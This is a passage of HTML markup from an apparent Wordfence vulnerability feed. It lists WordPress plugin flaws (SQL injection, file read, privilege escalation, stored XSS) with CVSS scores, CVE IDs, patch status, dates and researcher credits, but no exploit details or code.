<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9ee272f2-f0ec-42fb-884e-f523bf1100d0" target="_blank" rel="noopener">Yo 1.1 &#8211; 1.3.1 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87963" target="_blank" rel="noopener noreferrer">							CVE-2026-87963						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yo" target="_blank" rel="noopener">Yo</a> <span class="wfvr-software-slug">[yo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9ee272f2-f0ec-42fb-884e-f523bf1100d0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bf26cbb-42f0-4fb6-827e-98fcc58d3c70" target="_blank" rel="noopener">Yogeta WP Cloud &lt;= 1.0 &#8211; Unauthenticated Arbitrary File Read</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80494" target="_blank" rel="noopener noreferrer">							CVE-2026-80494						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yogeta-wp-cloud" target="_blank" rel="noopener">Yogeta WP Cloud</a> <span class="wfvr-software-slug">[yogeta-wp-cloud]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh-minhhk" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fd2bb32309c445d4b78303e1a770ded0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fd2bb32309c445d4b78303e1a770ded0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh-minhhk" target="_blank" rel="noopener">Huynh Kien Minh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bf26cbb-42f0-4fb6-827e-98fcc58d3c70" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/66ca4e6a-e489-4c86-a9d4-1eb89c97cc1c" target="_blank" rel="noopener">YS LeadGen – Popups, Opt-ins &amp; Lead Capture &lt;= 2.1.4 &#8211; Unauthenticated Information Disclosure in &#8216;ysleadgen_get_captured_data&#8217; AJAX Action</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1255" target="_blank" rel="noopener noreferrer">							CVE-2026-1255						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ysleadgen" target="_blank" rel="noopener">YS LeadGen – Drag and Drop Popup Builder, Form Builder, Exit Intent Popups &amp; Lead Capture for WordPress</a> <span class="wfvr-software-slug">[ysleadgen]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/66ca4e6a-e489-4c86-a9d4-1eb89c97cc1c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f3d597c3-fec9-4dda-a539-0df1d9358a15" target="_blank" rel="noopener">GiveWP &lt;= 4.16.8.0 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85530" target="_blank" rel="noopener noreferrer">							CVE-2026-85530						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f3d597c3-fec9-4dda-a539-0df1d9358a15" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70235939-87d3-464b-9884-c5b322614f51" target="_blank" rel="noopener">Headless SSO Plugin for WP &lt;= 1.7.0 &#8211; Unauthenticated Arbitrary Account Takeover</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62108" target="_blank" rel="noopener noreferrer">							CVE-2026-62108						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/headless-single-sign-on" target="_blank" rel="noopener">Headless SSO Plugin for WP</a> <span class="wfvr-software-slug">[headless-single-sign-on]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joost-grunwald" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joost-grunwald" target="_blank" rel="noopener">Joost Grunwald</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70235939-87d3-464b-9884-c5b322614f51" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a9f5602-f798-4beb-a3e7-06338f817ce2" target="_blank" rel="noopener">SAML Single Sign On &lt;= 5.0.0 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82842" target="_blank" rel="noopener noreferrer">							CVE-2026-82842						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-saml-20-single-sign-on-2" target="_blank" rel="noopener">SAML Single Sign On – SSO Login</a> <span class="wfvr-software-slug">[miniorange-saml-20-single-sign-on]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a9f5602-f798-4beb-a3e7-06338f817ce2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f23ff4ce-9e53-442a-8ac8-19ecb30dcd66" target="_blank" rel="noopener">UsersWP &#8211; Social Login &lt;= 1.5.9 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86814" target="_blank" rel="noopener noreferrer">							CVE-2026-86814						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/userswp-social-login" target="_blank" rel="noopener">UsersWP – Social Login</a> <span class="wfvr-software-slug">[userswp-social-login]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f23ff4ce-9e53-442a-8ac8-19ecb30dcd66" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39f8127b-bb3f-4b1c-a3e5-42a386f985f8" target="_blank" rel="noopener">WP Component &lt;= 2.2.4 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85681" target="_blank" rel="noopener noreferrer">							CVE-2026-85681						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcomponent" target="_blank" rel="noopener">WP Component</a> <span class="wfvr-software-slug">[wpcomponent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0a6ffe28510a376b315b173938329b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0a6ffe28510a376b315b173938329b1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener">Enrico Marcolini</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39f8127b-bb3f-4b1c-a3e5-42a386f985f8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f527947c-af67-4b86-b28f-987fa4ec71d3" target="_blank" rel="noopener">AF Companion &lt;= 2.1.0 &#8211; Authenticated (Shop Manager+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84738" target="_blank" rel="noopener noreferrer">							CVE-2026-84738						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/af-companion" target="_blank" rel="noopener">AF Companion – Starter Sites, Speed Booster &amp; Growth Suite for Professional Publishing</a> <span class="wfvr-software-slug">[af-companion]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farhan-fawwaz-saputra" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0e9aefbc4cb54cf3036b239ab7786ca3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0e9aefbc4cb54cf3036b239ab7786ca3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farhan-fawwaz-saputra" target="_blank" rel="noopener">Farhan Fawwaz Saputra</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f527947c-af67-4b86-b28f-987fa4ec71d3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4cc8ec2b-f203-4c7c-8720-043f8634a447" target="_blank" rel="noopener">Asset CleanUp: Page Speed Booster &lt;= 1.4.0.5 &#8211; Unauthenticated Stored Cross-Site Scripting via Comment Content</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13354" target="_blank" rel="noopener noreferrer">							CVE-2026-13354						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-asset-clean-up" target="_blank" rel="noopener">Asset CleanUp: Page Speed Booster</a> <span class="wfvr-software-slug">[wp-asset-clean-up]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-pham" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ce1fa8b42931a00204df4e057e0ab1a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ce1fa8b42931a00204df4e057e0ab1a5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-pham" target="_blank" rel="noopener">Pham Duc Anh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4cc8ec2b-f203-4c7c-8720-043f8634a447" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1115e1e9-92f4-462f-94d3-a64b8362a035" target="_blank" rel="noopener">BE REST Endpoints &lt;= 1.0.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81742" target="_blank" rel="noopener noreferrer">							CVE-2026-81742						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/be-rest-endpoints" target="_blank" rel="noopener">BE REST Endpoints</a> <span class="wfvr-software-slug">[be-rest-endpoints]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1115e1e9-92f4-462f-94d3-a64b8362a035" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab68a6b2-e9b0-4efa-bd01-c6e3e11011db" target="_blank" rel="noopener">Booking Calendar &lt;= 11.8.2 &#8211; Authenticated (Editor+) Privilege Escalation to &#8216;data_name&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92619" target="_blank" rel="noopener noreferrer">							CVE-2026-92619						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking" target="_blank" rel="noopener">Booking Calendar</a> <span class="wfvr-software-slug">[booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab68a6b2-e9b0-4efa-bd01-c6e3e11011db" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c53da813-0376-4c61-bfe0-fd8a2c946937" target="_blank" rel="noopener">Complianz GDPR/CCPA Cookie Consent Banner &lt;= 7.5.4 &#8211; Unauthenticated Stored Cross-Site Scripting via Elementor Cookie Blocker Regex</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-83561" target="_blank" rel="noopener noreferrer">							CVE-2026-83561						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/complianz-gdpr" target="_blank" rel="noopener">Complianz GDPR/CCPA Cookie Consent Banner</a> <span class="wfvr-software-slug">[complianz-gdpr]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c53da813-0376-4c61-bfe0-fd8a2c946937" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8058ea74-f872-4f08-ae4d-c8d1c2a40f08" target="_blank" rel="noopener">Dewa Kirim &lt;= 1.0.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87786" target="_blank" rel="noopener noreferrer">							CVE-2026-87786						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
